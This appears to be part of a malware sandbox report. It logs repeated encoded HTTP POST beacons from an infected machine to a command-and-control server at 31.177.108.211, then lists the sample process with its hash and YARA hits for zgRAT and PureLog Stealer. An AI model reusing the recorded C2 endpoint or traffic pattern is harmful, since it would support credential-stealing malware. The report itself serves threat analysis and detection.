                                          Sep 13, 2024 21:04:30.633544922 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:31.369916916 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:31.518280029 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          127 | 192.168.2.4 | 56797 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:31.650233030 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:32.445605993 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:32.749171972 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Sep 13, 2024 21:04:32.749185085 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          128 | 192.168.2.4 | 56798 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:32.892363071 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:33.646543026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:33.778697014 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          129 | 192.168.2.4 | 56799 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:33.894588947 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:34.658682108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:34.792778015 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:34 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          130 | 192.168.2.4 | 56800 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:34.921572924 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:35.693869114 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:35.825469017 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          131 | 192.168.2.4 | 56801 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:35.945612907 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          132 | 192.168.2.4 | 56802 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:36.370399952 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:36.723212957 CEST | 2108 | OUT | Data Raw: 5b 57 46 52 50 46 5c 55 59 5f 51 51 52 5c 54 53 5a 5b 5a 5c 55 54 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WFRPF\UY_QQR\TSZ[Z\UTSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+2Z#5X 06>;*R(=Y+()<30W%*#C%<';9[&!^-7
                                          Sep 13, 2024 21:04:37.129627943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:37.261051893 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0d 2b 35 2f 1d 33 05 27 1b 38 3e 3d 0b 30 11 3c 5c 3f 1d 25 44 28 04 3c 13 2d 14 0c 13 30 05 2d 5d 33 05 34 01 30 01 27 1b 3e 2a 2e 46 0d 1d 25 5c 3f 2f 20 1e 3e 10 2c 58 27 10 2d 5e 37 0e 3f 5d 27 01 38 0b 37 12 0c 5d 21 21 2c 0c 26 2a 2d 13 2f 43 2a 5f 28 32 3a 1c 23 26 2e 55 0f 15 3a 08 32 1f 36 56 2b 0b 20 00 3d 3c 26 1f 26 3c 23 54 26 3b 30 52 24 16 3e 1f 24 3f 08 04 26 21 3c 05 2a 3d 29 53 22 0f 00 19 35 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:+5/3'8>=0<\?%D(<-0-]340'>*.F%\?/ >,X'-^7?]'87]!!,&*-/C*_(2:#&.U:26V+ =<&&<#T&;0R$>$?&!<*=)S"5'T#(V3YT0
                                          Sep 13, 2024 21:04:37.500781059 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0d 2b 35 2f 1d 33 05 27 1b 38 3e 3d 0b 30 11 3c 5c 3f 1d 25 44 28 04 3c 13 2d 14 0c 13 30 05 2d 5d 33 05 34 01 30 01 27 1b 3e 2a 2e 46 0d 1d 25 5c 3f 2f 20 1e 3e 10 2c 58 27 10 2d 5e 37 0e 3f 5d 27 01 38 0b 37 12 0c 5d 21 21 2c 0c 26 2a 2d 13 2f 43 2a 5f 28 32 3a 1c 23 26 2e 55 0f 15 3a 08 32 1f 36 56 2b 0b 20 00 3d 3c 26 1f 26 3c 23 54 26 3b 30 52 24 16 3e 1f 24 3f 08 04 26 21 3c 05 2a 3d 29 53 22 0f 00 19 35 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:+5/3'8>=0<\?%D(<-0-]340'>*.F%\?/ >,X'-^7?]'87]!!,&*-/C*_(2:#&.U:26V+ =<&&<#T&;0R$>$?&!<*=)S"5'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          133 | 192.168.2.4 | 56803 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:36.495615959 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:36.848203897 CEST | 2532 | OUT | Data Raw: 5e 56 43 57 55 47 59 55 59 5f 51 51 52 5c 54 57 5a 5c 5a 51 55 56 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCWUGYUY_QQR\TWZ\ZQUVSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(<:\#"2#*1(/>=(T<*Y3%9(%Z%;9[&!^-7
                                          Sep 13, 2024 21:04:37.500060081 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:37.500616074 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:04:37.500653028 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          134 | 192.168.2.4 | 56804 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:37.630712986 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:37.989064932 CEST | 2532 | OUT | Data Raw: 5b 52 43 50 50 46 59 56 59 5f 51 51 52 50 54 55 5a 5b 5a 5c 55 5e 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPPFYVY_QQRPTUZ[Z\U^SBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A<27>"#-)2?=;8T+/"$ ,&*%?&+9[&!^-
                                          Sep 13, 2024 21:04:38.368002892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:38.522285938 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          135 | 192.168.2.4 | 56805 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:38.649760962 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:39.004472017 CEST | 2532 | OUT | Data Raw: 5b 5f 43 57 55 4a 5c 52 59 5f 51 51 52 5d 54 55 5a 59 5a 5c 55 52 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CWUJ\RY_QQR]TUZYZ\URSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9?/5#> 9])(*U?Z+8?'32: 1??';9[&!^-3
                                          Sep 13, 2024 21:04:39.399868011 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:39.532947063 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          136 | 192.168.2.4 | 56806 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:39.661396980 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:40.020231009 CEST | 2532 | OUT | Data Raw: 5e 56 46 55 55 42 5c 51 59 5f 51 51 52 51 54 57 5a 5a 5a 5c 55 55 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFUUB\QY_QQRQTWZZZ\UUSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<<672:##=((&??)[>+<('3,1*($?<X&9[&!^-
                                          Sep 13, 2024 21:04:40.412785053 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:40.565746069 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          137 | 192.168.2.4 | 56807 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:40.695302963 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:41.051325083 CEST | 2532 | OUT | Data Raw: 5b 54 43 57 50 43 5c 51 59 5f 51 51 52 5e 54 57 5a 59 5a 5d 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCWPC\QY_QQR^TWZYZ]UWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A?\ 2 #6=(:R<<%[=^(T)/:'%: 2<7%9[&!^-
                                          Sep 13, 2024 21:04:41.437607050 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:41.567092896 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          138 | 192.168.2.4 | 56808 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:41.691427946 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:42.039100885 CEST | 2532 | OUT | Data Raw: 5e 56 46 54 50 46 59 57 59 5f 51 51 52 5f 54 5b 5a 53 5a 50 55 50 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFTPFYWY_QQR_T[ZSZPUPSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(/!!2"##=+)()(0+?63/&,$<8_&9[&!^-;


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          139 | 192.168.2.4 | 56809 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:42.276323080 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2080
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:43.056803942 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:43.423708916 CEST | 25 | IN | HTTP/1.1 100 Continue


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                          140 | 192.168.2.4 | 56810 | 31.177.108.211 | 80
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:04:42.403116941 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:43.148972988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:43.423782110 CEST | 25 | IN | HTTP/1.1 100 Continue


                                          Target ID:0
                                          Start time:15:02:01
                                          Start date:13/09/2024
                                          Path:C:\Users\user\Desktop\84JufgBTrA.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\84JufgBTrA.exe"
                                          Imagebase:0xdd0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1886789398.000000001BB20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1841806382.0000000013369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          Wow64 process (32bit):false
